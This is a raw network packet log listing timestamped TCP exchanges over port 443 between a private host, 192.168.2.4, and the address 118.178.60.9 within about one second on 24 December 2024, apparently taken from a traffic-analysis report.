Dec 24, 2024 15:13:33.659574032 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.659585953 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.659603119 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.659609079 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.659637928 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.659666061 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.660218954 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.660276890 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.660481930 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.660521984 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.660532951 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.660537958 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.660559893 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.660567999 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.660587072 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.660589933 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.660595894 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.660615921 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.660645962 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.661382914 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.661426067 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.661451101 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.661456108 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.661469936 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.661483049 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.661497116 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.661500931 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.661505938 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.661526918 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.661556959 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.662143946 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.662192106 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.662350893 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.662399054 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.662524939 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.662555933 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.662580013 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.662587881 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.662600994 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.662635088 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.663463116 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.663501024 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.663516998 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.663525105 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.663558006 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.663566113 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.663578033 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.663578987 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.663587093 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.663609028 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.663649082 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.664330959 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.664392948 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.664396048 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.664414883 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.664439917 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.664458990 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.664467096 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.664509058 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.664515018 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.664530039 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.664539099 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.664546013 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.664566040 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.664571047 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.664606094 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.665560007 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.665618896 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.665846109 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.665887117 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.665925980 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.665968895 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.666081905 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.666112900 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.666127920 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.666135073 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.666146040 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.666157961 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.666176081 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.666181087 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.666204929 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.666234970 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.667211056 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.667248011 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.667262077 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.667267084 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.667292118 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.667294979 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.667325974 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.667332888 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.667361021 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.667401075 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.667885065 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.667920113 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.667937994 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.667944908 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.667956114 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.667960882 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.667984009 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.667988062 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.667999983 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.668015003 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.668030024 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.668056011 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.668061972 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.668076038 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.668102026 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.668246031 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.668293953 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.668466091 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.668519020 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.668637991 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.668685913 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.668694019 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.668699980 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.668720007 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.668725967 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.668749094 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.668754101 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.668783903 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.668807983 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.669478893 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.669512033 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.669540882 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.669545889 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.669553995 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.669574976 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.669606924 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.724412918 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.724498034 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.726495028 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.726553917 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.727489948 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.727545023 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.728820086 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.728873968 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.730217934 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.730274916 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.731798887 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.731847048 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.732729912 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.732794046 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.734714985 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.734772921 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.736141920 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.736206055 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.737893105 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.737952948 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.738769054 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.738820076 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.740523100 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.740577936 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.742238998 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.742305994 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.743346930 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.743401051 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.744827032 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.744904041 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.747441053 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.747482061 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.747512102 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.747522116 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.747535944 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.747560978 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.749728918 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.749782085 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.750849009 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.750905991 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.752129078 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.752182961 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.762777090 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.762881041 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.763012886 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.763055086 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.777156115 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.777209044 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.778484106 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.778534889 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.779616117 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.779673100 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.781120062 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.781169891 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.782433033 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.782726049 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.782777071 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.783689022 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.783736944 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.785361052 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.785407066 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.787055016 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.787111044 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.787985086 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.788031101 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.833537102 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.916167974 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.916404009 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.916750908 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.916825056 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.918456078 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.918520927 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.919763088 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.919831991 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.921344042 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.921395063 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.922261953 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.922310114 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.923631907 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.923677921 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.924740076 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.924798965 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.926211119 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.926305056 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.927572966 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.927633047 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.929193974 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.929388046 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.930345058 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.930408955 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.931560040 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.931613922 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.933032990 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.933085918 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.933881044 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.933932066 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.935439110 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.935487032 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.937035084 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.937098026 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.938019037 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.938070059 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.939304113 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.939352036 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.941320896 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.941371918 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.942111969 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.942162991 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.943629980 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.943698883 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.944812059 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.944864988 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.945421934 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.945965052 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.946016073 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.947603941 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.947657108 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.948595047 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.948648930 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.949949026 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.950001955 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.951458931 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.951534986 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.953427076 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.953481913 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.953952074 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.954005003 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.955383062 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.955435038 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.956239939 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:33.956295013 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:33.996783972 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.108366013 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.108442068 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.109292984 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.109352112 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.110908985 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.110964060 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.112313032 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.112364054 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.113164902 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.113218069 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.115540028 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.115592003 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.116204023 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.116276979 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.117526054 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.117578030 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.118654013 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.118705034 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.120158911 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.120213985 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.120934010 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.120985031 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.123287916 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.123344898 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.124037981 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.124126911 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.125617027 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.125669956 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.126457930 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.126504898 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.127990961 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.128048897 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.129540920 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.129591942 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.130723953 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.130774021 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.131896973 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.131944895 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.133197069 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.133245945 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.134741068 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.134793043 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.136234045 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.136277914 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.137063980 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.137130976 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.138561010 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.138612986 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.140141964 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.140191078 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.141552925 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.141608000 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.142482996 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.142534018 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.144079924 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.144134045 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.144947052 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.144994974 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.146684885 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.146735907 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.148019075 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.148071051 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.148838997 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.148888111 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.160643101 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.300934076 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.301002979 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.302002907 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.302058935 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.303301096 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.303344011 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.304830074 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.304887056 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.305711985 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.305768967 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.307837009 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.307904959 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.308779001 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.308830023 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.309729099 CET	443	49807	118.178.60.9	192.168.2.4
